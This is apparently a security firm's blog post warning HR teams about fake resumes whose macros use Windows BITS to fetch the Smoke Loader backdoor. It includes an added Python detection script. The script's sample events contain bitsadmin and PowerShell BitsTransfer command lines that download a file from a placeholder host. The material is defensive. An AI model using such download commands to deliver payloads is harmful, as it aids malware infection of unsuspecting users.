Malware Data Theft

Beware of a New Holiday Malware Attack

Attackers are taking advantage of the New Year, when hiring initiatives and the number of job applications companies receive go up, to send fake resumes that are hiding malware.

The emailed job applications carry password-protected Word document attachments. Because sandboxes and content-filtering anti-malware gateways cannot open the file without the password, they cannot inspect its contents, and the attachment passes through undetected.

The attacks abuse legitimate Windows tools. Once the recipient enables macros, a macro embedded in the Word document launches the Windows Background Intelligent Transfer Service (BITS) to download the payload, a Trojan called “Smoke Loader”. Because BITS is a legitimate built-in service, its use can bypass detection and application whitelisting.
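As an added example (not code from the original post or from ACT Network Solutions), the following Python shows one way a defender could hunt for the macro-to-BITS step described above in process-creation telemetry. It assumes records in a Sysmon Event ID 1 style (fields `EventID`, `Image`, `ParentImage`, `CommandLine`, `User`); the sample records, paths, URL and user name are constructed, and the choice of `bitsadmin.exe` and the PowerShell `Start-BitsTransfer` cmdlet as the ways a macro would drive BITS is an assumption, since the post does not say which mechanism the macro used.

```python
import ntpath
from typing import Dict, Iterable, List, Optional

# Office applications that should rarely, if ever, spawn a download utility directly.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Child processes taken here (assumption) to indicate BITS being driven from a macro:
# the bitsadmin.exe tool itself, or a PowerShell host invoking the BitsTransfer cmdlets.
BITS_TOOL = "bitsadmin.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
BITS_CMDLET_MARKERS = ("start-bitstransfer", "bitstransfer")

# Constructed sample telemetry (Sysmon Event ID 1 style); not real data from the campaign.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": '"WINWORD.EXE" /n resume_candidate.docx',
     "User": r"CORP\hr.user"},                       # benign: Outlook opening an attachment
    {"EventID": 1,
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"bitsadmin /transfer job1 http://example.invalid/file C:\Users\Public\f.bin",
     "User": r"CORP\hr.user"},                       # suspicious: Word spawning bitsadmin
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -c Start-BitsTransfer -Source http://example.invalid/file",
     "User": r"CORP\hr.user"},                       # suspicious: Word driving BITS via PowerShell
    {"EventID": 1,
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "bitsadmin /list",
     "User": r"CORP\it.admin"},                      # not flagged: no Office parent
    {"EventID": 3,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "",
     "User": "NT AUTHORITY\\SYSTEM"},                # ignored: not a process-creation event
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath makes this work on any host OS."""
    return ntpath.basename(path or "").lower()


def classify_event(event: Dict) -> Optional[str]:
    """Return a reason string if the event looks like BITS launched from an Office app, else None."""
    if event.get("EventID") != 1:
        return None
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmdline = (event.get("CommandLine") or "").lower()
    if parent not in OFFICE_IMAGES:
        return None
    if child == BITS_TOOL:
        return f"{parent} spawned {child}"
    if child in SCRIPT_HOSTS and any(marker in cmdline for marker in BITS_CMDLET_MARKERS):
        return f"{parent} spawned {child} using BitsTransfer cmdlets"
    return None


def hunt_bits_from_office(events: Iterable[Dict]) -> List[Dict]:
    """Collect every event that classify_event flags, with the context an analyst needs."""
    findings = []
    for event in events:
        reason = classify_event(event)
        if reason:
            findings.append({"user": event.get("User"),
                             "reason": reason,
                             "command_line": event.get("CommandLine")})
    return findings


if __name__ == "__main__":
    for finding in hunt_bits_from_office(SAMPLE_EVENTS):
        print(f"[ALERT] {finding['user']}: {finding['reason']} :: {finding['command_line']}")
```

In a real deployment the records would come from Sysmon, an EDR or a SIEM rather than the constructed list, and the parent-child check can be paired with the Microsoft-Windows-Bits-Client/Operational event log, which records BITS jobs regardless of which process created them.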

Smoke Loader is a backdoor: once installed, it gives cybercriminals full access to the infected machine, allowing them to steal data, launch further attacks on the network, and install other malware and ransomware. Smoke Loader is not new, but it has recently been upgraded with several anti-analysis mechanisms to prevent detection. It has also been known to download other malware such as the TrickBot banking Trojan and GlobeImposter ransomware.

This malware payload is stealthy and difficult to remove: once a machine is infected, the Smoke Loader Trojan evades detection by injecting itself into legitimate processes and establishes persistence by making changes to the registry.

HR staff should be forewarned about e-mail exploits like this in a special alert, and your ongoing security awareness training should stress that all e-mails carrying active content, such as Word documents, Excel spreadsheets and other unsecured documents, should be handled with great caution.

If you need help with malware detection and remediation or would like guidance on staff IT Security Training please give ACT Network Solutions a call at (847) 639-7000 or e-mail security@actnetworksolutions.com.